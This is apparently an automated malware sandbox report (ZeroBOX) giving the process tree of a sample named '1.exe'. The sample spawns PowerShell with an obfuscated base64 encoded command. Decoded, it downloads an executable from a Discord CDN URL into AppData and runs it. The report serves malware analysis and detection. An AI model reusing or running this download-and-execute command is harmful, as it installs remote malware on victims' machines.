popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • 1.exe "C:\Users\test22\AppData\Local\Temp\1.exe"

    2548

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAaABqACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADgANAA5ADEAMAAxADkANwA3ADEAOQA0ADQAOQA3ADMAMwAvADEAMAA4ADQAOQAxADAAMgA5ADYAMwAxADkAMQAzADkAOAA0ADAALwBSAHkAbgBNAGQAXwBwAHIAbwB0AGUAYwB0AGUAZAAuAGUAeABlACcALAAgADwAIwB3AG4AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcgB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHkAdABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEALgBlAHgAZQAnACkAKQA8ACMAcABkAG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAawBoAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEALgBlAHgAZQAnACkAPAAjAHgAZQBmACMAPgA="

      2688

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf